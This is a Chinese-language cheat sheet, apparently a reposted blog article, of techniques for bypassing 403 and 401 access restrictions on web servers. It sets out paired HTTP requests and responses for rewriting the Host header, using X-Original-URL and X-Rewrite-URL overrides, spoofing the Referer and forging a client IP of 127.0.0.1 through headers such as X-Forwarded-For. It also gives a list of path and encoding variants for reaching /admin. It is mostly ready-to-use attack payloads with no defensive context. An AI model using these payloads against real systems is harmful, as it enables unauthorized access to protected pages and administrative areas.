埠利用
掃描主機埠,找其它開放web服務的埠;訪問其埠,
修改HOST
把host值修改為子域名或者ip來繞過,
覆寫請求 URL
嘗試使用 X-Original-URL 和 X-Rewrite-URL 標頭繞過 Web 服務器的限制,
Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden
Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK
or
Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK
Referer 標頭繞過
嘗試使用 Referer 標頭繞過 Web 服務器的限制,
介紹:Referer 請求頭包含了當前請求頁面的來源頁面的地址,即表示當前頁面是通過此來源頁面里的鏈接進入的,服務端一般使用 Referer 請求頭識別訪問來源,
Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden
Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK
or
Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK
代理 IP
一般開發者會通過 Nginx 代理識別訪問端 IP 限制對介面的訪問,嘗試使用 X-Forwarded-For、X-Forwared-Host 等標頭繞過 Web 服務器的限制,
X-Originating-IP: 127.0.0.1
- X-Remote-IP: 127.0.0.1
- X-Client-IP: 127.0.0.1
- X-Forwarded-For: 127.0.0.1
- X-Forwared-Host: 127.0.0.1
- X-Host: 127.0.0.1
- X-Custom-IP-Authorization: 127.0.0.1
示例:
Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized
Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK
擴展名繞過
基于擴展名,用于繞過 403 受限制的目錄,
site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200
參考:https://www.wangan.com/articles/2483
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/413342.html
標籤:其他